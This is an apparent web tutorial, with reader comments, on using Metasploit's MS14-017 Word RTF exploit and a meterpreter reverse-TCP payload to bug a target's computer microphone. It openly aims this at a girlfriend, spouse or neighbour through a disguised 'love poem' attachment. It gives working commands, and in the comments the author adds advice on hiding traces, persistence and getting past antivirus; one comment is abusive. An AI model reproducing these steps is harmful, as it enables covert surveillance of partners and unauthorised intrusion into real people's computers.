Hack Like a Pro: How to Spy on Anyone, Part 1 (Hacking Computers)

How to Spy on Anyone, Part 1 (Hacking Computers)

Hack Like a Pro: How to Spy on Anyone, Part 1 (Hacking Computers)

Welcome back, my rookie hackers!

Now that nearly everyone and everyplace has a computer, you can use those remote computers for some good old "cloak and dagger" spying. No longer is spying something that only the CIA, NSA, KGB, and other intelligence agencies can do—you can learn to spy, too.

In this brand new series, we will explore how we can use the ubiquity of the computer to peek in on just about anyone and anyplace. Unlike the spy movies of yesteryear where the spy had to place a listening device in the lamp or in a houseplant, as long as there is a computer in the room, it can be used as a "bug."

We will examine how to turn that commonplace computer into our own bug to listen in on conversations, use as a spy camera, track Internet searches, and more. James Bond and Q have nothing on us!

In this first part, I will show you how to convert any computer, anywhere, into a listening device. As nearly every room now has a computer in it, you can put a bug in nearly every room, unnoticed and undetected.

Step 1: Fire Up Kali

The first step, of course, is to fire up Kali Linux. To be able to use any computer as a bug, the first step will be to compromise the target computer.

Step 2: Compromise the Remote Computer

Probably the best way to compromise your target's computer is to use a carefully crafted email that will get the target to click on a document or link. Inside that document or link, we will embed a rootkit/listener that will enable us to turn on the built-in microphone on their computer and save any conversations in the room where it is located.

Since we know the victim (it may be a girlfriend, neighbor, spouse, business associate, foreign diplomat, foreign spy, etc.), we can can be very specific in crafting an email that would gain their acceptance. The key, of course, is to create document that sounds compelling, or at least interesting, to get the victim to click on the Word document.

This becomes an exercise in social engineering at this point. If the victim is a girlfriend/boyfriend, you might try sending a love letter. If the victim is a business associate, it might be Word or Excel document with a sales or other report. If it is a neighbor, it may be a link to a community webpage.

I hope you get the point. Be creative and imaginative and send something that the person will be compelled to open and view.

Step 3: Find an Exploit

Now, if we want to exploit a Windows 7 system (most Windows 7 exploits will work on Windows 8), we will need to find a Windows 7 exploit that utilizes vulnerabilities in Microsoft's Word application.

This past spring, Microsoft revealed that hackers had found a vulnerability in Microsoft Word and Office Web apps that could allow remote code execution (read, rootkit). Here is Microsoft's announcement on their Technet Security Bulletin below (more info on Technet can be found here).

As you can see, they have named it MS14-017. When we do a search in Metasploit for this vulnerability/exploit, we find:

exploit/windows/fileformat/ms14_017_rtf

Now that we have found the proper exploit, let's load it into Metasploit by typing:

msf >use exploit/windows/fileformat/ms14_017_rtf

Once we have it loaded, let's type "info" to find more about this exploit.

Now, "show options."

As you can see, the option we need to fill is the FILENAME. In addition, note that this exploit works only on Office 2010.

Step 4: Set the FILENAME

In this example, we will be spying on your girlfriend, so let's send her a love poem. Let's set the FILENAME to "lovepoem.rtf."

set FILENAME lovepoem.rtf

Step 5: Set the Payload

Next, we need to set the payload to place in her "lovepoem." In this case, let's send the meterpreter as it gives us almost unlimited power and control over the hacked system.

msf > set PAYLOAD windows/meterpreter/reverse_tcp

Next, set the LHOST. This is the IP of your system. This tells the payload who to call back when it is executed by the victim.

Finally, simply type "exploit." This will create a Word file called "lovepoem" that will place the meterpreter on her system that we can then connect to.

Step 6: Open a Multi-Handler for the Connection

For the next step, we need to open a multi-handler to receive the connection back to our system.

msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp

And finally, set the LHOST to your IP.

Step 7: Send the Love Poem to Your Girfriend

Now that we have created our malicious file, you need to send it to your girlfriend. You likely will want to send it via an email attachment with a note telling her that your wrote her a short poem to express your love for her. Knowing that it is from you, I'm sure she will click on it as she loves you dearly and trusts you completely.

Step 8: Compromise Her System

When she opens it, we will have a meterpreter session on her computer like that below. Now comes the good part.

Step 9: Record with the Microphone

What we will do next is enable the microphone on her computer and begin to record all of the sounds within earshot of it. Metasploit has a Ruby script that will enable the microphone on the target machine and begin to record all sounds and conversations nearby. If we go to our ultimate list of meterpreter scripts, we can find it among the many ready Ruby scripts built for the meterpreter.

From the meterpreter prompt, simply type:

meterpreter > run sound_recorder - l /root

This will start the microphone on her computer and store the recorded conversations and sounds in a file in the /root directory on your system. Of course, you can choose any directory to store these recordings. Just make certain you have adequate hard drive space, as these files can become very large. When you want to hear what was recorded, simply open the stored file on your system.

Stay Tuned for More Spying Fun...

No longer is spying the exclusive province of the CIA, NSA, KGB, or MI5. With just a little computer skills, anyone can be a spy. In future tutorials, I will show you how to turn on webcams, take screenshots, download confidential files from anyone's computer, and more.

Cover image via Shutterstock

119 Comments

Great as always sir...

Thanks, can I ask something?
Does it make any scent to trace somebody who does it?
if it does, how to cover the trace?

and how to stop the recording sound after enough to spy on?
Thankyou

Helper:

Are you asking me how we can trace the spy? There are many ways that I will address in future forensic posts. As for how to cover a trace, you can use proxies. Check out my post on use proxychains .

You can set up the sound recorder to only record for a limited amount of time. In addition, once the system is rebooted you will lose the listener. Finally, you can simply terminate the meterpreter at your end and the recording will end.

OTW

Please I learn better by seeing the work in MP4 forms please if possible send me a. Video

Ok. give me a minute and I'll send one right away.

did u get a mp4 video from OTW??or was it a joke

Very Useful tutorial!
A question please.. Will my payload run every time the machine starts?
or I should use this payload to upload a RAT's Trojan that has an option of auto startUp?

Thanka!

Urattacker:

No, as I have set it up here, the recorder will die when the machine reboots. You will need to set up the meterpreter with persistence to restart on reboot. Check out my post on persistence.

OTW

shouldn't we also set the LPORT?

Yep, I quess OTW forgot it :I

thanks, very simple post.
now i need to learn what a multi-handler is.

Chris:

Metasploit' s multi handler is simply a module that will accept connections from many different payloads.

OTW

Since you don't know exactly when they will open the file, do you have to keep Kali running as it waits for the payload to execute?

But it is kinda inefficient to keep Kali running for 24 hours while you wait for them to open your email, isn't it?

In that case, is it possible to make the payload continuously attempt to connect to your system, so that when you boot Kali the next day (assuming the victim's computer is on), it will automatically connect to you?

This is a pretty cool post; thanks for sharing it!

It does that by default.

I don't understand the concept of inefficient? ? You are spying on someone and you are worried about energy consumption???

Dear OTW,

I want to ask princess' question in another way, is there any method for running time consuming scripts or waiting for connections in another computer with a higher speed and memory without the need to buy another computer? can we buy a VPS account from a host provider to do this? I would appreciate if you answer,since me and princess have some other works to do with our personal laptops besides hacking and meanwhile we don't wanna lose our connection with victim or stop our script!

Thanks in advance for your answer and also for every single of tutorials,you made me see a world I couldn't see before!

i have a question after saying exploit it writes that my file is stored in here /root/.msf4/local/lovepoem.rtf but i cant find it. so how can i send this with email ,while i cant find the document or word file? Or how can i find it?

Dogaca:

The .msf directory is a hidden directory. Move the file to another directory and then attach it to an email.

OTW

dear OTW,
i have 2 VMs up, one is kali, and one is the target im using for practice.
how would i like, transfer the listner from VM to VM?

How about email? Or physically move it? Or a network share?

I opened up the file on a different pc to see if this was working but the meterpreter thingy never shows up ?

Hello i have a set of questions

First, i am using linux, which LHOST should i use, i have tried 127.0.0.1 and in the "Hack Like a Pro: How to Embed a Backdoor Connection in an Innocent-Looking PDF" tutorial it binded to the ip, but still after i sent the link to a vulnerable pc it didnt connect.

And how does the payload know how to contact the hackers pc if its in a remote location outside local network and i only provide LHOST?

Joao:

The 127.0.0.1 IP address is only for use internally on your system. You must use the external IP address such as 192.168.1.101.

OTW

But i tried to infect a pc on my network and also didnt work. So i have to set my external ip adress right? And the port?

There are many reasons why that may have failed. First and always, make sure you connectivity. If you are on the same network, use the private IP. If outside your network, use the public IP and port forwarding.

OTW

how do i set the port forwarding?

Joao:

I don't have a tutorial on it, but I'm sure someone has. Did you try googling it?

OTW

i did and i spent our trying to configure it, since i am in a linux virtual machine, havent suceeded yet but ill try again tomorrow. thanks ;)

Hello. I am having trouble launching metasploit. It just stays like that for a period of time and kali linux shuts down unexpectedly.

bro, if you're using the kali OS then go to applications, then go to kali linux, then go to top 10 security tools and the metasploit framework should be there

thank you for help, but i got one more question, how do i move the file to another directory? is there a command for it?

Have you read my Linux tutorials? The Linux command is cp.

thanks again but there is a problem (again) i cant attach the file to email cause it says this file has virus it cannot be sent. by the way im using outlook. Do i need to change to another email? or is there another way?

and also sorry about bothering you with my questions. :D

Dogaca:

Because this attack has been around for awhile, the AV software recognizes it as a virus. You have a couple of options. One, find another way to send the file (physical or network share or another email system) or two, change the signature of the file. This is a bit more advanced and may not be appropriate for a beginner.

OTW

Hi I have done all the parts correctly but at the end when I want to send the file via email, I can't really find where it is stored. I tried /root/.msf4/local/FILENAME.rtf , it didn't work out.

Is there a way that I can change the directory?

Kiyar:

the .msf directory is hidden.

OTW

So basically how can I attach the .rtf file by email if it's all hidden. sorry to bother you with my questions.

When you are at "Home" press Ctrl+h It will show hidden files and folders.

Simply use the absolute path to the file. Even though the directory is hidden, it can still be acessed.

You can see any hidden directory by using ls -al.

by typing Is -al it only displays the hidden directory, how exactly can I bring it to my home directory? sorry for noobish question

Faizan:

Welcome to Null Byte!

To move any file in Linux, you can use the mv (move) command or the cp (copy) command. You might want to look through my Linux series here.

OTW

Even though i have not a clue, it was exciting to read your article but after glancing down and reading these comments my brain hurts!

Thank you very much for your tutorials,I'm happy I found you and this site! I've gone exactly according to this tutorial,the firewall on victim is off,the victim(myself on another computer in the local network) ran the file,is using office 2010,with windows 7 Ultimate(no sp installed) but my meterpreter session doesn't initialize,what am i missing?

Same problem as yours bro.

hey im wanting to know if there some guides about coding, code that exploits and hacks use mostly

OTW

I have the same HOsein's problem any help please ? my meterpreter session doesn't initialize.

Hi OTW,
Thanks for all the great tutorials you keep making !

If I were using this to get into a computer on an external network, under LHOST do I enter my public IP or private IP ? And presuming I have port forwarding setup, would this work on any open port on the external network ? Finally, do I need to set LPORT ?

Thanks,
Luke

hi
i want to see whats she s doing exactly on her pc ..what the page that shs oppening and stuf not only to hear .
ty

Daniel:

I'll be doing more tutorials on the subject very soon, but in the meantime check out some of my other Metasploit tutorials here in Null Byte and check out thislist of scripts you can run from Metasploit.

OTW

Now i am pretty happy to go on exploring ahead using meterpreter i am just wondering, did you ever make a tutorial, or is there anywhere i can read about making something like a listener, but that starts up when the windows starts up. For example i manage to get the listener to the target once, and then even if the target shuts down his computer, the next time he starts it up i can connect up on the existing listener :) ?

Dejan:

Check out this article on making the listener persistent. In this way, whenever the victim reboots, the listener will reconnect to your computer.

OTW

Many thanks OTW, exacly what i was looking for!

if you transfer the file with usb ?

John:

Welcome to Null Byte!

I'm not sure I understand your question. Can you elaborate please?

OTW

Can we put data into the actual word file, so it's not so suspicious when it's opened

Yes, of course.

Send her a love poem. She'll love you for it.

Thanks man,

One more question how do we move the file into another directory so we can see it?

In Linux, you can use the mv (move) command.

Thanks so much OTW, enjoying all your tutorials, keep it up!

I figured out how to find and open the file, how do we add content to it? when I open it, it is just lots of line of code

Now I know why I heard laughter coming from John Marshall Williamson's house next door when I was talking to my wife.

dumb fuck, I hope he commits suicide.
No more privacy in this evil world.

Hi OTW,

I followed your instructions and generated the rtf file with the payload. When I add it to a Gmail as an attachment, Gmail exclaims that it is a virus and does not allow it to be sent. Is there anyway around this? Also, is there a way to save the file as a .doc or .docx so it looks like a real word file?

Thanks,
Matthew

how do I change the location of this file?

Hello OTW,

Im having a problem. When I try to exploit it says "starting the payload handler". But then it's stuck. Im pretty sure that i've done all the commands correctly. Maybe it's due to running kali on a vm, idk..

Hope to hear from you!

yes she did open the file

Are you on the same network or did you enable portforwarding?

I'm on the same network as the victim's computer

yes i can ping the victim

OTW, what is the start port and end port should i used in port forwarding ?, thanks

Thanks for this tutorial bro...
when i create a backdoor with this command :
msfpayload windows/meterpreter/reversetcp LHOST=IP LPORT=4444 R x>/root/Desktop/bc.exe
and send it to victim , that work carefully !
but when i create file by this method and send him ... don't work! just file opened and echo into it "{" character!
Win: 7
Office: 2010
what's my problem? do you know?

Image via tinypic.com

What kind of file are you making? Your above command creates an executable file with a meterpreter backdoor.

i'm sorry ... can you help me?? :-)
I don't know why these problems happen to me really!!!!!!! :0

Has the patch been installed on the box? OTW posted a link in the article giving the details on the patch.

after the victim has opened the msword document with the embedded metasploit things. is there any message that i will recieve, just like the way RATs notefy you of any new connection, so that i can tell that the server has been been installed in the victims device? or what next?

You will get the meterpreter prompt on your computer like in the tutorial.

You can also make a small script to make a beeping noise if it detects you have a Meterpreter prompt, if you want that much.

The two main problems I see with this:

1) sending an rtf file would be suspicious. I don't more than 10% of users would even associate that file extension with MO.

2) It requires MO 2010, which is less of a problem because people tend to update infrequently.

Also, using Veil-Evasion I changed the signature of a known exploit (rev-tcp) as suggested in one of your tutorials. Can I just simply load this custom payload into any exploit? I rekon that if its possible, I must have the custom payload in the payload directories, right?

Thanks in advance!

Yes. He actually released a tutorial for this about a month ago right Here

How do you do this on Mac? If I'm not mistaken, this only works on windows...

This attack only works on Word on Windows.

Hey,

Thanks for such nice post, keep up the good work!

Wanted to ask which tcp port does the reverse tcp tunnel uses in order to connect me to the victim's machine?

Much Regards

Very nice post!
I know that it's possible do that without being in the victim network, but what configuration should I use to do that?

You need to use the target and your public IP's and port forward through your router.

it is deteted by the anti virus?

OTW, is anyway I can use to turn on the computer when it's powered off by using meterpreter or other ways?

Hi OTW
Im new at hacking and did everything you said
But i cant execute the "use exploid/multi/handler"
What would it be?

It hard to say from what little info you gave me, but if you spelled the way you did here, it's typo. Check your spelling.

hey sorry maybe another noob question but can you give somemore detail on how to move the file cause it seems i cant do it?

thanx in advance

oooww well this is embarrassing
anyway thanks

Sorry to hijack this topic mr occupytheweb...but maybe someday you can do post focused on how things is exploit..for example...

Inside this topic you mention about ms14 - 017 exploit...maybe you can explain how the creator of this exploit do it...I mean in a really technical detail...

just want to ask, Is this legit? I'm sorry if I ask that. I just want to be sure that this is not scam. Thank you. :)

yeah this is legit.

I'm curious as to how to find my file when I create it as it does not pop up in my root folder

Did you put it in your root folder?

Thanks for your fast reply! And I'll just send you an attachment with my problem.

I cannot find my file. I've also tried going through your basics. As seen in the next two images.

(Rest of terminal below)

I appreciate you helping me. :)

It tells you in the second screenshot that your file is in .//msf5/local/Resume.rtf. You need to use that path in your exploit.

Thanks again but how exactly do I use the path?, I tried finding the folder where the file is located, but had no luck. Sorry for asking so much.

You found it with th efind command. It's at /.msf5/local/Resume.rtf

When you use Metasploit simply use the full path to that document.

Oh seriously? Thanks, how would I go about sending the file tho? And I mean I can't find the directory it gave me.

Also when I search for the file on my computer I only get these, In which I don't think any of them are the file as they do not have ".rtf" after the name "Resume" (Filename of my choice)

The directory you put it in, /.msf5 is a hidden directory. Move to your desktop and use it from there.

Thanks again, Yeah I was able to transfer the file from the hidden folder to my documents! :D

hi i did all the instuctions , my friend did open that file but the meterpreter did not show up o.O what shall i do , help me plz

Do the computers have to be on the same network?

i am sure that i followed all the steps perfectly but the meterpreter prompt wont appear

hello
may i know how to hack a pc with its ip address because i can not send him a mail but i know his pc ip address

Hello! I am new to metasploit. I am using Armitage because I couldn't find normal metasploit on the desktop. Anyway, it says that theres a problem with INFILENAME. I already defined it. Help?

what about a snapchat account hack?
would you be able to help out w/one of those. PLEASE.

@OCCUPYTHEWEB that is not an external IP address.

I just get endless SSL erros from outside networks.

chief ,here I use my public iddress as LHOST as the victim is not in my LAN network but i didn't get the meterpreter console when he opened the rtf file???

pl help

Share Your Thoughts

  • Hot
  • Latest